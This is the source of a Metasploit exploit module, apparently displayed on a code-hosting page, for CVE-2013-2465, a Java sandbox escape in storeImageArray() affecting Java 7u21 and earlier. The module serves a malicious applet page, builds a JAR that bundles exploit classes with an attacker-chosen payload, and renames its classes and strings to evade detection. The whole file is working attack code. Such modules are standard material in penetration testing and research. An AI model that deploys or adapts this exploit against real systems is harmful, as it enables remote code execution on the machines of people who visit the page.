Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default
8

9
  include Msf::Exploit::Remote::HttpServer::HTML
10

11
  #include Msf::Exploit::Remote::BrowserAutopwn
12
  #autopwn_info({ :javascript => false })
13

14
  def initialize( info = {} )
15
    super( update_info( info,
16
      'Name'          => 'Java storeImageArray() Invalid Array Indexing Vulnerability',
17
      'Description'   => %q{
18
        This module abuses an Invalid Array Indexing Vulnerability on the
19
        static function storeImageArray() function in order to cause a
20
        memory corruption and escape the Java Sandbox. The vulnerability
21
        affects Java version 7u21 and earlier. The module, which doesn't bypass
22
        click2play, has been tested successfully on Java 7u21 on Windows and
23
        Linux systems.
24
      },
25
      'License'       => MSF_LICENSE,
26
      'Author'        =>
27
        [
28
          'Unknown',  # From PacketStorm
29
          'sinn3r', # Metasploit
30
          'juan vazquez' # Metasploit
31
        ],
32
      'References'    =>
33
        [
34
          [ 'CVE', '2013-2465' ],
35
          [ 'OSVDB', '96269' ],
36
          [ 'EDB', '27526' ],
37
          [ 'PACKETSTORM', '122777' ],
38
          [ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/2a9c79db0040' ]
39
        ],
40
      'Platform'      => %w{ java linux win },
41
      'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
42
      'Targets'       =>
43
        [
44
          [ 'Generic (Java Payload)',
45
            {
46
              'Arch'     => ARCH_JAVA,
47
              'Platform' => 'java'
48
            }
49
          ],
50
          [ 'Windows Universal',
51
            {
52
              'Arch'     => ARCH_X86,
53
              'Platform' => 'win'
54
            }
55
          ],
56
          [ 'Linux x86',
57
            {
58
              'Arch'     => ARCH_X86,
59
              'Platform' => 'linux'
60
            }
61
          ]
62
        ],
63
      'DefaultTarget'  => 0,
64
      'DisclosureDate' => '2013-08-12'
65
      ))
66
  end
67

68
  def setup
69
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2465", "Exploit.class")
70
    @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
71
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2465", "Exploit$MyColorModel.class")
72
    @color_model_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
73
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2465", "Exploit$MyColorSpace.class")
74
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
75

76
    @exploit_class_name = rand_text_alpha("Exploit".length)
77
    @color_model_class_name = rand_text_alpha("MyColorModel".length)
78
    @color_space_class_name = rand_text_alpha("MyColorSpace".length)
79

80
    @exploit_class.gsub!("Exploit", @exploit_class_name)
81
    @exploit_class.gsub!("MyColorModel", @color_model_class_name)
82
    @exploit_class.gsub!("MyColorSpace", @color_space_class_name)
83

84
    @color_model_class.gsub!("Exploit", @exploit_class_name)
85
    @color_model_class.gsub!("MyColorModel", @color_model_class_name)
86
    @color_model_class.gsub!("MyColorSpace", @color_space_class_name)
87

88

89
    @color_space_class.gsub!("Exploit", @exploit_class_name)
90
    @color_space_class.gsub!("MyColorModel", @color_model_class_name)
91
    @color_space_class.gsub!("MyColorSpace", @color_space_class_name)
92

93
    super
94
  end
95

96
  def on_request_uri( cli, request )
97
    vprint_status("Requesting: #{request.uri}")
98
    if request.uri !~ /\.jar$/i
99
      if not request.uri =~ /\/$/
100
        vprint_status("Sending redirect...")
101
        send_redirect(cli, "#{get_resource}/", '')
102
        return
103
      end
104

105
      print_status("Sending HTML...")
106
      send_response_html(cli, generate_html, {'Content-Type'=>'text/html'})
107
      return
108
    end
109

110
    print_status("Sending .jar file...")
111
    send_response(cli, generate_jar(cli), {'Content-Type'=>'application/java-archive'})
112

113
    handler( cli )
114
  end
115

116
  def generate_html
117
    jar_name = rand_text_alpha(5+rand(3))
118
    html = %Q|<html>
119
    <head>
120
    </head>
121
    <body>
122
    <applet archive="#{jar_name}.jar" code="#{@exploit_class_name}" width="1000" height="1000">
123
    </applet>
124
    </body>
125
    </html>
126
    |
127
    html = html.gsub(/^ {4}/, '')
128
    return html
129
  end
130

131
  def generate_jar(cli)
132

133
    p = regenerate_payload(cli)
134
    jar  = p.encoded_jar
135

136
    jar.add_file("#{@exploit_class_name}.class", @exploit_class)
137
    jar.add_file("#{@exploit_class_name}$#{@color_model_class_name}.class", @color_model_class)
138
    jar.add_file("#{@exploit_class_name}$#{@color_space_class_name}.class", @color_space_class)
139
    metasploit_str = rand_text_alpha("metasploit".length)
140
    payload_str = rand_text_alpha("payload".length)
141
    jar.entries.each { |entry|
142
      entry.name.gsub!("metasploit", metasploit_str)
143
      entry.name.gsub!("Payload", payload_str)
144
      entry.data = entry.data.gsub("metasploit", metasploit_str)
145
      entry.data = entry.data.gsub("Payload", payload_str)
146
    }
147
    jar.build_manifest
148

149
    return jar.pack
150
  end
151
end
152

153